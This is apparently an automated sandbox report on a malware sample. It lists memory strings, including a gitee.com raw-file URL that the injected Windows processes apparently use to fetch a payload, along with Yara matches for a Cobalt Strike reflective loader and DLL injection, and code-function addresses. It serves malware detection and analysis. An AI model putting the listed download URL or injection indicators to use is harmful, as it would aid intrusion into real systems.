Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 1731043030539.exe	String found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
Source: 1731043030539.exe	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 1731043030539.exe	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: explorer.exe, 00000002.00000000.2044223303.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3298493696.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3299027484.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2051006700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3305053857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2039818389.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000003.3094503764.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2039818389.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3297386884.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000002.3295607778.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038249716.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: control.exe, fontview.exe, resmon.exe, BackgroundTransferHost.exe, raserver.exe	String found in binary or memory: https://gitee.com/didiaodewangzhe/jsonAPP/raw/master/raidjsonapi.cpp
Source: explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000002.3305053857.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2051006700.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

System Summary

Malicious sample detected (through community Yara rule)

Source: 1731043030539.exe, type: SAMPLE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.3.svchost.exe.1ad89460818.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b7f0000.6.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b720000.5.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b650000.4.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.180000000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.3.svchost.exe.1ad89460818.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.3.control.exe.b107f8.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 10.3.raserver.exe.2ac07f8.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b170000.2.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 8.3.resmon.exe.23007f8.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 9.2.BackgroundTransferHost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 6.3.fontview.exe.8207f8.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.control.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 6.2.fontview.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1800280b0.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 10.2.raserver.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.3.svchost.exe.1ad894834c8.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 8.2.resmon.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.svchost.exe.1ad8b580000.3.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen

Source: C:\Windows\SysWOW64\control.exe

Code function: 3_2_1001060E __EH_prolog,CreateProcessAsUserA,CloseHandle,GetLastError,

3_2_1001060E

Source: C:\Users\user\Desktop\1731043030539.exe	Code function: 0_2_00007FF6E53411CB	0_2_00007FF6E53411CB
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89470560	1_3_000001AD89470560
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD894769DD	1_3_000001AD894769DD
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD8946A42C	1_3_000001AD8946A42C
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89476F70	1_3_000001AD89476F70
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD8947E31B	1_3_000001AD8947E31B
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89460000	1_3_000001AD89460000
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD8946B3A8	1_3_000001AD8946B3A8
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD8946B688	1_3_000001AD8946B688
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89462E88	1_3_000001AD89462E88
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_0000000180003270	1_2_0000000180003270
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_000000018000A814	1_2_000000018000A814
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_0000000180010040	1_2_0000000180010040
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_0000000180010948	1_2_0000000180010948
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_0000000180012DB8	1_2_0000000180012DB8
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_000000018000BA70	1_2_000000018000BA70
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_0000000180005730	1_2_0000000180005730
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_000000018000B790	1_2_000000018000B790
Source: C:\Windows\System32\svchost.exe	Code function: 1_3_000001AD89465348	1_3_000001AD89465348
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_3_00B1023D	3_3_00B1023D
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1000B13E	3_2_1000B13E
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10001183	3_2_10001183
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10013372	3_2_10013372
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1003A3D4	3_2_1003A3D4
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1003942A	3_2_1003942A
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10042656	3_2_10042656
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1003A809	3_2_1003A809
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10033A50	3_2_10033A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10039AC8	3_2_10039AC8
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10004B5B	3_2_10004B5B
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10013B81	3_2_10013B81
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10001B94	3_2_10001B94
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10003BFD	3_2_10003BFD
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1003AC3E	3_2_1003AC3E
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10003CEA	3_2_10003CEA
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10012D83	3_2_10012D83
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10039FBC	3_2_10039FBC
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_3_0082023D	6_3_0082023D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1000B13E	6_2_1000B13E
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10001183	6_2_10001183
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10013372	6_2_10013372
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1003A3D4	6_2_1003A3D4
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1003942A	6_2_1003942A
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10042656	6_2_10042656
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1003A809	6_2_1003A809
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10033A50	6_2_10033A50
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10039AC8	6_2_10039AC8
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10004B5B	6_2_10004B5B
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10013B81	6_2_10013B81
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10001B94	6_2_10001B94
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10003BFD	6_2_10003BFD
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1003AC3E	6_2_1003AC3E
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10003CEA	6_2_10003CEA
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10012D83	6_2_10012D83
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10039FBC	6_2_10039FBC
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_3_0230023D	8_3_0230023D
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1000B13E	8_2_1000B13E
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10001183	8_2_10001183
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10013372	8_2_10013372
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1003A3D4	8_2_1003A3D4
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1003942A	8_2_1003942A
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10042656	8_2_10042656
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1003A809	8_2_1003A809
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10033A50	8_2_10033A50
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10039AC8	8_2_10039AC8
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10004B5B	8_2_10004B5B
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10013B81	8_2_10013B81
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10001B94	8_2_10001B94
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10003BFD	8_2_10003BFD
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1003AC3E	8_2_1003AC3E
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10003CEA	8_2_10003CEA
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10012D83	8_2_10012D83
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10039FBC	8_2_10039FBC
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_3_006B023D	9_3_006B023D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1000B13E	9_2_1000B13E
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10001183	9_2_10001183
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10013372	9_2_10013372
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1003A3D4	9_2_1003A3D4
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1003942A	9_2_1003942A
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10042656	9_2_10042656
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1003A809	9_2_1003A809
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10033A50	9_2_10033A50
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10039AC8	9_2_10039AC8
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10004B5B	9_2_10004B5B
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10013B81	9_2_10013B81
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10001B94	9_2_10001B94
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10003BFD	9_2_10003BFD
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1003AC3E	9_2_1003AC3E
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10003CEA	9_2_10003CEA
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10012D83	9_2_10012D83
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10039FBC	9_2_10039FBC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_3_02AC023D	10_3_02AC023D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1000B13E	10_2_1000B13E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10001183	10_2_10001183
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10042656	10_2_10042656
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10033A50	10_2_10033A50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10039AC8	10_2_10039AC8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10004B5B	10_2_10004B5B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10001B94	10_2_10001B94
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10003BFD	10_2_10003BFD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10003CEA	10_2_10003CEA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10012D83	10_2_10012D83

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 1000191F appears 31 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 1004EB10 appears 138 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 10008FE1 appears 36 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 1003248D appears 31 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 1003CB40 appears 42 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 1004EB10 appears 143 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 1000191F appears 31 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 1000A3F4 appears 87 times
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: String function: 10008FE1 appears 36 times
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: String function: 1003248D appears 31 times
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: String function: 1003CB40 appears 42 times
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: String function: 1004EB10 appears 143 times
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: String function: 1000191F appears 31 times
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: String function: 1000A3F4 appears 87 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 10008FE1 appears 36 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 1003248D appears 31 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 1003CB40 appears 42 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 1004EB10 appears 143 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 1000191F appears 31 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 1000A3F4 appears 87 times
Source: C:\Windows\SysWOW64\resmon.exe	Code function: String function: 10008FE1 appears 36 times
Source: C:\Windows\SysWOW64\resmon.exe	Code function: String function: 1003248D appears 31 times
Source: C:\Windows\SysWOW64\resmon.exe	Code function: String function: 1003CB40 appears 42 times
Source: C:\Windows\SysWOW64\resmon.exe	Code function: String function: 1004EB10 appears 143 times
Source: C:\Windows\SysWOW64\resmon.exe	Code function: String function: 1000191F appears 31 times
Source: C:\Windows\SysWOW64\resmon.exe	Code function: String function: 1000A3F4 appears 87 times

Source: 1731043030539.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
